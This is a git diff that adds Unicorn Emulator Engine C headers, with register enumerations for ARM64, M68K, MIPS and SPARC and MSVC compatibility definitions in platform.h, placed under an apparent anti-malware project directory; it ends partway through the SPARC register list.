--- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/arm64.h @@ -0,0 +1,344 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_ARM64_H +#define UNICORN_ARM64_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> ARM64 registers +typedef enum uc_arm64_reg { + UC_ARM64_REG_INVALID = 0, + + UC_ARM64_REG_X29, + UC_ARM64_REG_X30, + UC_ARM64_REG_NZCV, + UC_ARM64_REG_SP, + UC_ARM64_REG_WSP, + UC_ARM64_REG_WZR, + UC_ARM64_REG_XZR, + UC_ARM64_REG_B0, + UC_ARM64_REG_B1, + UC_ARM64_REG_B2, + UC_ARM64_REG_B3, + UC_ARM64_REG_B4, + UC_ARM64_REG_B5, + UC_ARM64_REG_B6, + UC_ARM64_REG_B7, + UC_ARM64_REG_B8, + UC_ARM64_REG_B9, + UC_ARM64_REG_B10, + UC_ARM64_REG_B11, + UC_ARM64_REG_B12, + UC_ARM64_REG_B13, + UC_ARM64_REG_B14, + UC_ARM64_REG_B15, + UC_ARM64_REG_B16, + UC_ARM64_REG_B17, + UC_ARM64_REG_B18, + UC_ARM64_REG_B19, + UC_ARM64_REG_B20, + UC_ARM64_REG_B21, + UC_ARM64_REG_B22, + UC_ARM64_REG_B23, + UC_ARM64_REG_B24, + UC_ARM64_REG_B25, + UC_ARM64_REG_B26, + UC_ARM64_REG_B27, + UC_ARM64_REG_B28, + UC_ARM64_REG_B29, + UC_ARM64_REG_B30, + UC_ARM64_REG_B31, + UC_ARM64_REG_D0, + UC_ARM64_REG_D1, + UC_ARM64_REG_D2, + UC_ARM64_REG_D3, + UC_ARM64_REG_D4, + UC_ARM64_REG_D5, + UC_ARM64_REG_D6, + UC_ARM64_REG_D7, + UC_ARM64_REG_D8, + UC_ARM64_REG_D9, + UC_ARM64_REG_D10, + UC_ARM64_REG_D11, + UC_ARM64_REG_D12, + UC_ARM64_REG_D13, + UC_ARM64_REG_D14, + UC_ARM64_REG_D15, + UC_ARM64_REG_D16, + UC_ARM64_REG_D17, + UC_ARM64_REG_D18, + UC_ARM64_REG_D19, + UC_ARM64_REG_D20, + UC_ARM64_REG_D21, + UC_ARM64_REG_D22, + UC_ARM64_REG_D23, + UC_ARM64_REG_D24, + UC_ARM64_REG_D25, + UC_ARM64_REG_D26, + UC_ARM64_REG_D27, + UC_ARM64_REG_D28, + UC_ARM64_REG_D29, + UC_ARM64_REG_D30, + UC_ARM64_REG_D31, + UC_ARM64_REG_H0, + UC_ARM64_REG_H1, + UC_ARM64_REG_H2, + UC_ARM64_REG_H3, + UC_ARM64_REG_H4, + UC_ARM64_REG_H5, + UC_ARM64_REG_H6, + UC_ARM64_REG_H7, + UC_ARM64_REG_H8, + UC_ARM64_REG_H9, + UC_ARM64_REG_H10, + UC_ARM64_REG_H11, + UC_ARM64_REG_H12, + UC_ARM64_REG_H13, + UC_ARM64_REG_H14, + UC_ARM64_REG_H15, + UC_ARM64_REG_H16, + UC_ARM64_REG_H17, + UC_ARM64_REG_H18, + UC_ARM64_REG_H19, + UC_ARM64_REG_H20, + UC_ARM64_REG_H21, + UC_ARM64_REG_H22, + UC_ARM64_REG_H23, + UC_ARM64_REG_H24, + UC_ARM64_REG_H25, + UC_ARM64_REG_H26, + UC_ARM64_REG_H27, + UC_ARM64_REG_H28, + UC_ARM64_REG_H29, + UC_ARM64_REG_H30, + UC_ARM64_REG_H31, + UC_ARM64_REG_Q0, + UC_ARM64_REG_Q1, + UC_ARM64_REG_Q2, + UC_ARM64_REG_Q3, + UC_ARM64_REG_Q4, + UC_ARM64_REG_Q5, + UC_ARM64_REG_Q6, + UC_ARM64_REG_Q7, + UC_ARM64_REG_Q8, + UC_ARM64_REG_Q9, + UC_ARM64_REG_Q10, + UC_ARM64_REG_Q11, + UC_ARM64_REG_Q12, + UC_ARM64_REG_Q13, + UC_ARM64_REG_Q14, + UC_ARM64_REG_Q15, + UC_ARM64_REG_Q16, + UC_ARM64_REG_Q17, + UC_ARM64_REG_Q18, + UC_ARM64_REG_Q19, + UC_ARM64_REG_Q20, + UC_ARM64_REG_Q21, + UC_ARM64_REG_Q22, + UC_ARM64_REG_Q23, + UC_ARM64_REG_Q24, + UC_ARM64_REG_Q25, + UC_ARM64_REG_Q26, + UC_ARM64_REG_Q27, + UC_ARM64_REG_Q28, + UC_ARM64_REG_Q29, + UC_ARM64_REG_Q30, + UC_ARM64_REG_Q31, + UC_ARM64_REG_S0, + UC_ARM64_REG_S1, + UC_ARM64_REG_S2, + UC_ARM64_REG_S3, + UC_ARM64_REG_S4, + UC_ARM64_REG_S5, + UC_ARM64_REG_S6, + UC_ARM64_REG_S7, + UC_ARM64_REG_S8, + UC_ARM64_REG_S9, + UC_ARM64_REG_S10, + UC_ARM64_REG_S11, + UC_ARM64_REG_S12, + UC_ARM64_REG_S13, + UC_ARM64_REG_S14, + UC_ARM64_REG_S15, + UC_ARM64_REG_S16, + UC_ARM64_REG_S17, + UC_ARM64_REG_S18, + UC_ARM64_REG_S19, + UC_ARM64_REG_S20, + UC_ARM64_REG_S21, + UC_ARM64_REG_S22, + UC_ARM64_REG_S23, + UC_ARM64_REG_S24, + UC_ARM64_REG_S25, + UC_ARM64_REG_S26, + UC_ARM64_REG_S27, + UC_ARM64_REG_S28, + UC_ARM64_REG_S29, + UC_ARM64_REG_S30, + UC_ARM64_REG_S31, + UC_ARM64_REG_W0, + UC_ARM64_REG_W1, + UC_ARM64_REG_W2, + UC_ARM64_REG_W3, + UC_ARM64_REG_W4, + UC_ARM64_REG_W5, + UC_ARM64_REG_W6, + UC_ARM64_REG_W7, + UC_ARM64_REG_W8, + UC_ARM64_REG_W9, + UC_ARM64_REG_W10, + UC_ARM64_REG_W11, + UC_ARM64_REG_W12, + UC_ARM64_REG_W13, + UC_ARM64_REG_W14, + UC_ARM64_REG_W15, + UC_ARM64_REG_W16, + UC_ARM64_REG_W17, + UC_ARM64_REG_W18, + UC_ARM64_REG_W19, + UC_ARM64_REG_W20, + UC_ARM64_REG_W21, + UC_ARM64_REG_W22, + UC_ARM64_REG_W23, + UC_ARM64_REG_W24, + UC_ARM64_REG_W25, + UC_ARM64_REG_W26, + UC_ARM64_REG_W27, + UC_ARM64_REG_W28, + UC_ARM64_REG_W29, + UC_ARM64_REG_W30, + UC_ARM64_REG_X0, + UC_ARM64_REG_X1, + UC_ARM64_REG_X2, + UC_ARM64_REG_X3, + UC_ARM64_REG_X4, + UC_ARM64_REG_X5, + UC_ARM64_REG_X6, + UC_ARM64_REG_X7, + UC_ARM64_REG_X8, + UC_ARM64_REG_X9, + UC_ARM64_REG_X10, + UC_ARM64_REG_X11, + UC_ARM64_REG_X12, + UC_ARM64_REG_X13, + UC_ARM64_REG_X14, + UC_ARM64_REG_X15, + UC_ARM64_REG_X16, + UC_ARM64_REG_X17, + UC_ARM64_REG_X18, + UC_ARM64_REG_X19, + UC_ARM64_REG_X20, + UC_ARM64_REG_X21, + UC_ARM64_REG_X22, + UC_ARM64_REG_X23, + UC_ARM64_REG_X24, + UC_ARM64_REG_X25, + UC_ARM64_REG_X26, + UC_ARM64_REG_X27, + UC_ARM64_REG_X28, + + UC_ARM64_REG_V0, + UC_ARM64_REG_V1, + UC_ARM64_REG_V2, + UC_ARM64_REG_V3, + UC_ARM64_REG_V4, + UC_ARM64_REG_V5, + UC_ARM64_REG_V6, + UC_ARM64_REG_V7, + UC_ARM64_REG_V8, + UC_ARM64_REG_V9, + UC_ARM64_REG_V10, + UC_ARM64_REG_V11, + UC_ARM64_REG_V12, + UC_ARM64_REG_V13, + UC_ARM64_REG_V14, + UC_ARM64_REG_V15, + UC_ARM64_REG_V16, + UC_ARM64_REG_V17, + UC_ARM64_REG_V18, + UC_ARM64_REG_V19, + UC_ARM64_REG_V20, + UC_ARM64_REG_V21, + UC_ARM64_REG_V22, + UC_ARM64_REG_V23, + UC_ARM64_REG_V24, + UC_ARM64_REG_V25, + UC_ARM64_REG_V26, + UC_ARM64_REG_V27, + UC_ARM64_REG_V28, + UC_ARM64_REG_V29, + UC_ARM64_REG_V30, + UC_ARM64_REG_V31, + + //> pseudo registers + UC_ARM64_REG_PC, // program counter register + + UC_ARM64_REG_CPACR_EL1, + + //> thread registers + UC_ARM64_REG_TPIDR_EL0, + UC_ARM64_REG_TPIDRRO_EL0, + UC_ARM64_REG_TPIDR_EL1, + + UC_ARM64_REG_PSTATE, + + //> exception link registers + UC_ARM64_REG_ELR_EL0, + UC_ARM64_REG_ELR_EL1, + UC_ARM64_REG_ELR_EL2, + UC_ARM64_REG_ELR_EL3, + + //> stack pointers registers + UC_ARM64_REG_SP_EL0, + UC_ARM64_REG_SP_EL1, + UC_ARM64_REG_SP_EL2, + UC_ARM64_REG_SP_EL3, + + //> other CP15 registers + UC_ARM64_REG_TTBR0_EL1, + UC_ARM64_REG_TTBR1_EL1, + + UC_ARM64_REG_ESR_EL0, + UC_ARM64_REG_ESR_EL1, + UC_ARM64_REG_ESR_EL2, + UC_ARM64_REG_ESR_EL3, + + UC_ARM64_REG_FAR_EL0, + UC_ARM64_REG_FAR_EL1, + UC_ARM64_REG_FAR_EL2, + UC_ARM64_REG_FAR_EL3, + + UC_ARM64_REG_PAR_EL1, + + UC_ARM64_REG_MAIR_EL1, + + UC_ARM64_REG_VBAR_EL0, + UC_ARM64_REG_VBAR_EL1, + UC_ARM64_REG_VBAR_EL2, + UC_ARM64_REG_VBAR_EL3, + + UC_ARM64_REG_ENDING, // <-- mark the end of the list of registers + + //> alias registers + + UC_ARM64_REG_IP0 = UC_ARM64_REG_X16, + UC_ARM64_REG_IP1 = UC_ARM64_REG_X17, + UC_ARM64_REG_FP = UC_ARM64_REG_X29, + UC_ARM64_REG_LR = UC_ARM64_REG_X30, +} uc_arm64_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/m68k.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/m68k.h new file mode 100644 index 0000000..80e8b92 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/m68k.h @@ -0,0 +1,50 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2014-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_M68K_H +#define UNICORN_M68K_H + +#ifdef __cplusplus +extern "C" { +#endif + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> M68K registers +typedef enum uc_m68k_reg { + UC_M68K_REG_INVALID = 0, + + UC_M68K_REG_A0, + UC_M68K_REG_A1, + UC_M68K_REG_A2, + UC_M68K_REG_A3, + UC_M68K_REG_A4, + UC_M68K_REG_A5, + UC_M68K_REG_A6, + UC_M68K_REG_A7, + + UC_M68K_REG_D0, + UC_M68K_REG_D1, + UC_M68K_REG_D2, + UC_M68K_REG_D3, + UC_M68K_REG_D4, + UC_M68K_REG_D5, + UC_M68K_REG_D6, + UC_M68K_REG_D7, + + UC_M68K_REG_SR, + UC_M68K_REG_PC, + + UC_M68K_REG_ENDING, // <-- mark the end of the list of registers +} uc_m68k_reg; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/mips.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/mips.h new file mode 100644 index 0000000..77fde3c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/mips.h @@ -0,0 +1,232 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_MIPS_H +#define UNICORN_MIPS_H + +#ifdef __cplusplus +extern "C" { +#endif + +// GCC MIPS toolchain has a default macro called "mips" which breaks +// compilation +#undef mips + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> MIPS registers +typedef enum UC_MIPS_REG { + UC_MIPS_REG_INVALID = 0, + //> General purpose registers + UC_MIPS_REG_PC, + + UC_MIPS_REG_0, + UC_MIPS_REG_1, + UC_MIPS_REG_2, + UC_MIPS_REG_3, + UC_MIPS_REG_4, + UC_MIPS_REG_5, + UC_MIPS_REG_6, + UC_MIPS_REG_7, + UC_MIPS_REG_8, + UC_MIPS_REG_9, + UC_MIPS_REG_10, + UC_MIPS_REG_11, + UC_MIPS_REG_12, + UC_MIPS_REG_13, + UC_MIPS_REG_14, + UC_MIPS_REG_15, + UC_MIPS_REG_16, + UC_MIPS_REG_17, + UC_MIPS_REG_18, + UC_MIPS_REG_19, + UC_MIPS_REG_20, + UC_MIPS_REG_21, + UC_MIPS_REG_22, + UC_MIPS_REG_23, + UC_MIPS_REG_24, + UC_MIPS_REG_25, + UC_MIPS_REG_26, + UC_MIPS_REG_27, + UC_MIPS_REG_28, + UC_MIPS_REG_29, + UC_MIPS_REG_30, + UC_MIPS_REG_31, + + //> DSP registers + UC_MIPS_REG_DSPCCOND, + UC_MIPS_REG_DSPCARRY, + UC_MIPS_REG_DSPEFI, + UC_MIPS_REG_DSPOUTFLAG, + UC_MIPS_REG_DSPOUTFLAG16_19, + UC_MIPS_REG_DSPOUTFLAG20, + UC_MIPS_REG_DSPOUTFLAG21, + UC_MIPS_REG_DSPOUTFLAG22, + UC_MIPS_REG_DSPOUTFLAG23, + UC_MIPS_REG_DSPPOS, + UC_MIPS_REG_DSPSCOUNT, + + //> ACC registers + UC_MIPS_REG_AC0, + UC_MIPS_REG_AC1, + UC_MIPS_REG_AC2, + UC_MIPS_REG_AC3, + + //> COP registers + UC_MIPS_REG_CC0, + UC_MIPS_REG_CC1, + UC_MIPS_REG_CC2, + UC_MIPS_REG_CC3, + UC_MIPS_REG_CC4, + UC_MIPS_REG_CC5, + UC_MIPS_REG_CC6, + UC_MIPS_REG_CC7, + + //> FPU registers + UC_MIPS_REG_F0, + UC_MIPS_REG_F1, + UC_MIPS_REG_F2, + UC_MIPS_REG_F3, + UC_MIPS_REG_F4, + UC_MIPS_REG_F5, + UC_MIPS_REG_F6, + UC_MIPS_REG_F7, + UC_MIPS_REG_F8, + UC_MIPS_REG_F9, + UC_MIPS_REG_F10, + UC_MIPS_REG_F11, + UC_MIPS_REG_F12, + UC_MIPS_REG_F13, + UC_MIPS_REG_F14, + UC_MIPS_REG_F15, + UC_MIPS_REG_F16, + UC_MIPS_REG_F17, + UC_MIPS_REG_F18, + UC_MIPS_REG_F19, + UC_MIPS_REG_F20, + UC_MIPS_REG_F21, + UC_MIPS_REG_F22, + UC_MIPS_REG_F23, + UC_MIPS_REG_F24, + UC_MIPS_REG_F25, + UC_MIPS_REG_F26, + UC_MIPS_REG_F27, + UC_MIPS_REG_F28, + UC_MIPS_REG_F29, + UC_MIPS_REG_F30, + UC_MIPS_REG_F31, + + UC_MIPS_REG_FCC0, + UC_MIPS_REG_FCC1, + UC_MIPS_REG_FCC2, + UC_MIPS_REG_FCC3, + UC_MIPS_REG_FCC4, + UC_MIPS_REG_FCC5, + UC_MIPS_REG_FCC6, + UC_MIPS_REG_FCC7, + + //> AFPR128 + UC_MIPS_REG_W0, + UC_MIPS_REG_W1, + UC_MIPS_REG_W2, + UC_MIPS_REG_W3, + UC_MIPS_REG_W4, + UC_MIPS_REG_W5, + UC_MIPS_REG_W6, + UC_MIPS_REG_W7, + UC_MIPS_REG_W8, + UC_MIPS_REG_W9, + UC_MIPS_REG_W10, + UC_MIPS_REG_W11, + UC_MIPS_REG_W12, + UC_MIPS_REG_W13, + UC_MIPS_REG_W14, + UC_MIPS_REG_W15, + UC_MIPS_REG_W16, + UC_MIPS_REG_W17, + UC_MIPS_REG_W18, + UC_MIPS_REG_W19, + UC_MIPS_REG_W20, + UC_MIPS_REG_W21, + UC_MIPS_REG_W22, + UC_MIPS_REG_W23, + UC_MIPS_REG_W24, + UC_MIPS_REG_W25, + UC_MIPS_REG_W26, + UC_MIPS_REG_W27, + UC_MIPS_REG_W28, + UC_MIPS_REG_W29, + UC_MIPS_REG_W30, + UC_MIPS_REG_W31, + + UC_MIPS_REG_HI, + UC_MIPS_REG_LO, + + UC_MIPS_REG_P0, + UC_MIPS_REG_P1, + UC_MIPS_REG_P2, + + UC_MIPS_REG_MPL0, + UC_MIPS_REG_MPL1, + UC_MIPS_REG_MPL2, + + UC_MIPS_REG_CP0_CONFIG3, + UC_MIPS_REG_CP0_USERLOCAL, + + UC_MIPS_REG_ENDING, // <-- mark the end of the list or registers + + // alias registers + UC_MIPS_REG_ZERO = UC_MIPS_REG_0, + UC_MIPS_REG_AT = UC_MIPS_REG_1, + UC_MIPS_REG_V0 = UC_MIPS_REG_2, + UC_MIPS_REG_V1 = UC_MIPS_REG_3, + UC_MIPS_REG_A0 = UC_MIPS_REG_4, + UC_MIPS_REG_A1 = UC_MIPS_REG_5, + UC_MIPS_REG_A2 = UC_MIPS_REG_6, + UC_MIPS_REG_A3 = UC_MIPS_REG_7, + UC_MIPS_REG_T0 = UC_MIPS_REG_8, + UC_MIPS_REG_T1 = UC_MIPS_REG_9, + UC_MIPS_REG_T2 = UC_MIPS_REG_10, + UC_MIPS_REG_T3 = UC_MIPS_REG_11, + UC_MIPS_REG_T4 = UC_MIPS_REG_12, + UC_MIPS_REG_T5 = UC_MIPS_REG_13, + UC_MIPS_REG_T6 = UC_MIPS_REG_14, + UC_MIPS_REG_T7 = UC_MIPS_REG_15, + UC_MIPS_REG_S0 = UC_MIPS_REG_16, + UC_MIPS_REG_S1 = UC_MIPS_REG_17, + UC_MIPS_REG_S2 = UC_MIPS_REG_18, + UC_MIPS_REG_S3 = UC_MIPS_REG_19, + UC_MIPS_REG_S4 = UC_MIPS_REG_20, + UC_MIPS_REG_S5 = UC_MIPS_REG_21, + UC_MIPS_REG_S6 = UC_MIPS_REG_22, + UC_MIPS_REG_S7 = UC_MIPS_REG_23, + UC_MIPS_REG_T8 = UC_MIPS_REG_24, + UC_MIPS_REG_T9 = UC_MIPS_REG_25, + UC_MIPS_REG_K0 = UC_MIPS_REG_26, + UC_MIPS_REG_K1 = UC_MIPS_REG_27, + UC_MIPS_REG_GP = UC_MIPS_REG_28, + UC_MIPS_REG_SP = UC_MIPS_REG_29, + UC_MIPS_REG_FP = UC_MIPS_REG_30, UC_MIPS_REG_S8 = UC_MIPS_REG_30, + UC_MIPS_REG_RA = UC_MIPS_REG_31, + + UC_MIPS_REG_HI0 = UC_MIPS_REG_AC0, + UC_MIPS_REG_HI1 = UC_MIPS_REG_AC1, + UC_MIPS_REG_HI2 = UC_MIPS_REG_AC2, + UC_MIPS_REG_HI3 = UC_MIPS_REG_AC3, + + UC_MIPS_REG_LO0 = UC_MIPS_REG_HI0, + UC_MIPS_REG_LO1 = UC_MIPS_REG_HI1, + UC_MIPS_REG_LO2 = UC_MIPS_REG_HI2, + UC_MIPS_REG_LO3 = UC_MIPS_REG_HI3, +} UC_MIPS_REG; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/platform.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/platform.h new file mode 100644 index 0000000..5bbfd8a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/platform.h @@ -0,0 +1,221 @@ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +/* + This file is to support header files that are missing in MSVC and + other non-standard compilers. +*/ +#ifndef UNICORN_PLATFORM_H +#define UNICORN_PLATFORM_H + +/* +These are the various MSVC versions as given by _MSC_VER: +MSVC++ 14.0 _MSC_VER == 1900 (Visual Studio 2015) +MSVC++ 12.0 _MSC_VER == 1800 (Visual Studio 2013) +MSVC++ 11.0 _MSC_VER == 1700 (Visual Studio 2012) +MSVC++ 10.0 _MSC_VER == 1600 (Visual Studio 2010) +MSVC++ 9.0 _MSC_VER == 1500 (Visual Studio 2008) +MSVC++ 8.0 _MSC_VER == 1400 (Visual Studio 2005) +MSVC++ 7.1 _MSC_VER == 1310 (Visual Studio 2003) +MSVC++ 7.0 _MSC_VER == 1300 +MSVC++ 6.0 _MSC_VER == 1200 +MSVC++ 5.0 _MSC_VER == 1100 +*/ +#define MSC_VER_VS2003 1310 +#define MSC_VER_VS2005 1400 +#define MSC_VER_VS2008 1500 +#define MSC_VER_VS2010 1600 +#define MSC_VER_VS2012 1700 +#define MSC_VER_VS2013 1800 +#define MSC_VER_VS2015 1900 + +// handle stdbool.h compatibility +#if !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) +// MSVC + +// stdbool.h +#if (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) +// this system does not have stdbool.h +#ifndef __cplusplus +typedef unsigned char bool; +#define false 0 +#define true 1 +#endif // __cplusplus + +#else +// VisualStudio 2013+ -> C99 is supported +#include <stdbool.h> +#endif // (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) + +#else +// not MSVC -> C99 is supported +#include <stdbool.h> +#endif // !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined (_WIN64)) + +#if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || defined(_KERNEL_MODE) +// this system does not have stdint.h +typedef signed char int8_t; +typedef signed short int16_t; +typedef signed int int32_t; +typedef unsigned char uint8_t; +typedef unsigned short uint16_t; +typedef unsigned int uint32_t; +typedef signed long long int64_t; +typedef unsigned long long uint64_t; + +#ifndef _INTPTR_T_DEFINED + #define _INTPTR_T_DEFINED + #ifdef _WIN64 +typedef long long intptr_t; + #else /* _WIN64 */ +typedef _W64 int intptr_t; + #endif /* _WIN64 */ +#endif /* _INTPTR_T_DEFINED */ + +#ifndef _UINTPTR_T_DEFINED + #define _UINTPTR_T_DEFINED + #ifdef _WIN64 +typedef unsigned long long uintptr_t; + #else /* _WIN64 */ +typedef _W64 unsigned int uintptr_t; + #endif /* _WIN64 */ +#endif /* _UINTPTR_T_DEFINED */ + +#define INT8_MIN (-127i8 - 1) +#define INT16_MIN (-32767i16 - 1) +#define INT32_MIN (-2147483647i32 - 1) +#define INT64_MIN (-9223372036854775807i64 - 1) +#define INT8_MAX 127i8 +#define INT16_MAX 32767i16 +#define INT32_MAX 2147483647i32 +#define INT64_MAX 9223372036854775807i64 +#define UINT8_MAX 0xffui8 +#define UINT16_MAX 0xffffui16 +#define UINT32_MAX 0xffffffffui32 +#define UINT64_MAX 0xffffffffffffffffui64 +#else // this system has stdint.h +#include <stdint.h> +#endif // (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || defined(_KERNEL_MODE) + +// handle inttypes.h compatibility +#if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013)) || defined(_KERNEL_MODE) +// this system does not have inttypes.h + +#define __PRI_8_LENGTH_MODIFIER__ "hh" +#define __PRI_64_LENGTH_MODIFIER__ "ll" + +#define PRId8 __PRI_8_LENGTH_MODIFIER__ "d" +#define PRIi8 __PRI_8_LENGTH_MODIFIER__ "i" +#define PRIo8 __PRI_8_LENGTH_MODIFIER__ "o" +#define PRIu8 __PRI_8_LENGTH_MODIFIER__ "u" +#define PRIx8 __PRI_8_LENGTH_MODIFIER__ "x" +#define PRIX8 __PRI_8_LENGTH_MODIFIER__ "X" + +#define PRId16 "hd" +#define PRIi16 "hi" +#define PRIo16 "ho" +#define PRIu16 "hu" +#define PRIx16 "hx" +#define PRIX16 "hX" + +#if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) +#define PRId32 "ld" +#define PRIi32 "li" +#define PRIo32 "lo" +#define PRIu32 "lu" +#define PRIx32 "lx" +#define PRIX32 "lX" +#else // OSX +#define PRId32 "d" +#define PRIi32 "i" +#define PRIo32 "o" +#define PRIu32 "u" +#define PRIx32 "x" +#define PRIX32 "X" +#endif // defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) + +#if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012) +// redefine functions from inttypes.h used in cstool +#define strtoull _strtoui64 +#endif + +#define PRId64 __PRI_64_LENGTH_MODIFIER__ "d" +#define PRIi64 __PRI_64_LENGTH_MODIFIER__ "i" +#define PRIo64 __PRI_64_LENGTH_MODIFIER__ "o" +#define PRIu64 __PRI_64_LENGTH_MODIFIER__ "u" +#define PRIx64 __PRI_64_LENGTH_MODIFIER__ "x" +#define PRIX64 __PRI_64_LENGTH_MODIFIER__ "X" + +#else +// this system has inttypes.h by default +#include <inttypes.h> +#endif // #if defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE) + +// sys/time.h compatibility +#if defined(_MSC_VER) +#include <sys/timeb.h> +#include <winsock2.h> +#include <windows.h> + +static int gettimeofday(struct timeval* t, void* timezone) +{ + struct _timeb timebuffer; + _ftime( &timebuffer ); + t->tv_sec = (long)timebuffer.time; + t->tv_usec = 1000*timebuffer.millitm; + return 0; +} +#else +#include <sys/time.h> +#endif + +// unistd.h compatibility +#if defined(_MSC_VER) + +static int usleep(uint32_t usec) +{ + HANDLE timer; + LARGE_INTEGER due; + + timer = CreateWaitableTimer(NULL, TRUE, NULL); + if (!timer) + return -1; + + due.QuadPart = (-((int64_t) usec)) * 10LL; + if (!SetWaitableTimer(timer, &due, 0, NULL, NULL, 0)) { + CloseHandle(timer); + return -1; + } + WaitForSingleObject(timer, INFINITE); + CloseHandle(timer); + + return 0; +} + +#else +#include <unistd.h> +#endif + +// misc support +#if defined(_MSC_VER) +#ifdef _WIN64 +typedef signed __int64 ssize_t; +#else +typedef _W64 signed int ssize_t; +#endif + +#ifndef va_copy +#define va_copy(d,s) ((d) = (s)) +#endif +#define strcasecmp _stricmp +#if (_MSC_VER < MSC_VER_VS2015) +#define snprintf _snprintf +#endif +#if (_MSC_VER <= MSC_VER_VS2013) +#define strtoll _strtoi64 +#endif +#endif + + +#endif // UNICORN_PLATFORM_H diff --git a/ai_anti_malware/unicorn/unicorn-master/include/unicorn/sparc.h b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/sparc.h new file mode 100644 index 0000000..08e0538 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/include/unicorn/sparc.h @@ -0,0 +1,130 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2014-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_SPARC_H +#define UNICORN_SPARC_H + +#ifdef __cplusplus +extern "C" { +#endif + +// GCC SPARC toolchain has a default macro called "sparc" which breaks +// compilation +#undef sparc + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +//> SPARC registers +typedef enum uc_sparc_reg { + UC_SPARC_REG_INVALID = 0, + + UC_SPARC_REG_F0, + UC_SPARC_REG_F1, + UC_SPARC_REG_F2, + UC_SPARC_REG_F3, + UC_SPARC_REG_F4, + UC_SPARC_REG_F5, + UC_SPARC_REG_F6, + UC_SPARC_REG_F7, + UC_SPARC_REG_F8, + UC_SPARC_REG_F9, + UC_SPARC_REG_F10, + UC_SPARC_REG_F11, + UC_SPARC_REG_F12, + UC_SPARC_REG_F13, + UC_SPARC_REG_F14, + UC_SPARC_REG_F15, + UC_SPARC_REG_F16, + UC_SPARC_REG_F17, + UC_SPARC_REG_F18, + UC_SPARC_REG_F19, + UC_SPARC_REG_F20, + UC_SPARC_REG_F21, + UC_SPARC_REG_F22, + UC_SPARC_REG_F23, + UC_SPARC_REG_F24, + UC_SPARC_REG_F25, + UC_SPARC_REG_F26, + UC_SPARC_REG_F27, + UC_SPARC_REG_F28, + UC_SPARC_REG_F29, + UC_SPARC_REG_F30, + UC_SPARC_REG_F31, + UC_SPARC_REG_F32, + UC_SPARC_REG_F34, + UC_SPARC_REG_F36, + UC_SPARC_REG_F38, + UC_SPARC_REG_F40, + UC_SPARC_REG_F42, + UC_SPARC_REG_F44, + UC_SPARC_REG_F46, + UC_SPARC_REG_F48, + UC_SPARC_REG_F50, + UC_SPARC_REG_F52, + UC_SPARC_REG_F54, + UC_SPARC_REG_F56, + UC_SPARC_REG_F58, + UC_SPARC_REG_F60, + UC_SPARC_REG_F62, + UC_SPARC_REG_FCC0, // Floating condition codes + UC_SPARC_REG_FCC1, + UC_SPARC_REG_FCC2, + UC_SPARC_REG_FCC3, + UC_SPARC_REG_G0, + UC_SPARC_REG_G1, + UC_SPARC_REG_G2, + UC_SPARC_REG_G3, + UC_SPARC_REG_G4, + UC_SPARC_REG_G5, + UC_SPARC_REG_G6, + UC_SPARC_REG_G7, + UC_SPARC_REG_I0, + UC_SPARC_REG_I1, + UC_SPARC_REG_I2, + UC_SPARC_REG_I3, + UC_SPARC_REG_I4, + UC_SPARC_REG_I5, + UC_SPARC_REG_FP, + UC_SPARC_REG_I7, + UC_SPARC_REG_ICC, // Integer condition codes + UC_SPARC_REG_L0, + UC_SPARC_REG_L1, + UC_SPARC_REG_L2, + UC_SPARC_REG_L3, + UC_SPARC_REG_L4, + UC_SPARC_REG_L5, + UC_SPARC_REG_L6, + UC_SPARC_REG_L7, + UC_SPARC_REG_O0, + UC_SPARC_REG_O1, + UC_SPARC_REG_O2, + UC_SPARC_REG_O3, + UC_SPARC_REG_O4, + UC_SPARC_REG_O5, + UC_SPARC_REG_SP, + 